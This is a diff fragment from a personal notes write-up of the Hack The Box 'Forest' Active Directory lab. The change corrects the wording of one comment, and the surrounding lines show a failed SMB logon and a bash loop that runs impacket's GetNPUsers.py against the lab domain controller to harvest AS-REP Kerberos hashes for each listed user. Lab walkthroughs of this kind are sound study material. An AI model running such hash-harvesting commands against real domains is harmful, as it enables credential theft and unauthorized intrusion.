thesinghsec/HackingNotes101/Machines/AD/Forest.md

 Cannot connect to server.
 Error was NT_STATUS_LOGON_FAILURE
 ```

-# Lets use impacket tool- GetNPUsers.py to try get hash for each user.
+# Let's use the impacket tool- GetNPUsers.py to try to get a hash for each user.
 ```bash
 ┌──(singhx㉿kali)-[~]
 └─$ for user in $(cat user.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done